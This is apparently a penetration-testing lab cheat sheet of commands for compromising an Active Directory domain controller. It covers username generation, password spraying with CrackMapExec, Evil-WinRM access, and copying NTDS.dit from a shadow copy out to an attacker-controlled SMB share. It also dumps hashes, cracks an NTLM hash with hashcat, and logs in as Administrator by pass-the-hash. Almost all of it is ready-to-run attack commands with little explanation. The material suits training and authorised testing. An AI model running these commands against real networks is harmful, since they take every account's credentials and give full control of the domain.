Active Directory and NTDS.dit
Username Anarchy
./username-anarchy -i /home/ltnbob/names.txt Attacking with CrackMapExec
$ crackmapexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txtCapturing NTDS.dit
Connecting to the DC using Evil-WinRM
$ evil-winrm -i 10.129.201.57 -u bwilliamson -p 'P@55w0rd!'Checking Local Group Membership
*Evil-WinRM* PS C:\> net localgroupChecking User Account Privileges including Domain
*Evil-WinRM* PS C:\> net user bwilliamsonCreating Shadow Copy of C
*Evil-WinRM* PS C:\> vssadmin CREATE SHADOW /For=C:Copying NTDS.dit from the VSS
*Evil-WinRM* PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
Transferring NTDS.dit to the Attack Host
*Evil-WinRM* PS C:\NTDS> cmd.exe /c move C:\NTDS\NTDS.dit \\10.10.15.30\CompData Using CrackMapExec to capture NTDS.dit
$ crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntdsCracking Hashes and Gaining Credentials
$ sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txtPass-the-Hash using Evil-WinRM
$ evil-winrm -i 10.129.201.57 -u Administrator -H "64f12cddaa88057e06a81b54e73b949b"Last updated